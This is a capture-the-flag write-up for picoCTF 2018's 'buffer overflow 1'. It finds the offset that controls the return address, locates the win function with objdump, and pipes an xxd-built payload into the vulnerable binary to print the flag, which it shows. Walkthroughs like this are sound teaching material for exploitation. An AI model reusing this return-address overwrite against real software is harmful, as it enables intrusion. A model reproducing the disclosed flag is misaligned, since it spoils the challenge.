Binary Exploitation 200: buffer overflow 1
Challenge
Okay now you’re cooking! This time can you overflow the buffer and return to the flag function in this program? You can find it in /problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba on the shell server. Source.
Solution
Using an entirely manual binary search we find out which bytes we actually control:
1
2
3
4
5
6
7
8
9
10
11
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
Okay, time to return... Fingers Crossed... Jumping to 0x62616161
Segmentation fault
...
hxr@pico-2018-shell-1:/problems/buffer-overflow-1_2_86cbe4de3cdc8986063c379e61f669ba$ ./vuln
Please enter your string:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba
Okay, time to return... Fingers Crossed... Jumping to 0x61626364
Segmentation fault
Ok, good. Now we have control of the return, we just need to point it to wherever the flag is printed? I guess that’s the win function
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ objdump -x -d vuln
....
080485cb <win>:
80485cb: 55 push %ebp
80485cc: 89 e5 mov %esp,%ebp
80485ce: 83 ec 58 sub $0x58,%esp
80485d1: 83 ec 08 sub $0x8,%esp
80485d4: 68 50 87 04 08 push $0x8048750
80485d9: 68 52 87 04 08 push $0x8048752
80485de: e8 bd fe ff ff call 80484a0 <fopen@plt>
80485e3: 83 c4 10 add $0x10,%esp
80485e6: 89 45 f4 mov %eax,-0xc(%ebp)
80485e9: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
80485ed: 75 1a jne 8048609 <win+0x3e>
80485ef: 83 ec 0c sub $0xc,%esp
...
So we want to return to 0x080485cb
First I experimented with some known characters in order to figure out the byte
mapping because little endian doesn’t work with xxd -r
1
2
3
4
5
6
7
$ echo -n 'ÏÖ' | xxd -e # Little endian
00000000: 96c38fc3 ....
$ echo -n 'ÏÖ' | xxd # Big endian
00000000: c38f c396 ....
$ # 080485cb < our target string
$ echo '00000000: cb85 0408' | xxd -r
$ # And the mapping is a bunch of unprintable characters.
This needs to be prefixed with a known length of buffer so we’ll just construct something xxd is happy with:
1
2
3
00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408
And then run this on the server:
1
2
3
4
5
6
$ echo '00000000: 61616161 61616161 61616161 61616161
00000010: 61616161 61616161 61616161 61616161
00000020: 61616161 61616161 61616161 cb850408' | xxd -r | ./vuln
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault
It works!!!
Flag
picoCTF{addr3ss3s_ar3_3asy56a7b196}Segmentation fault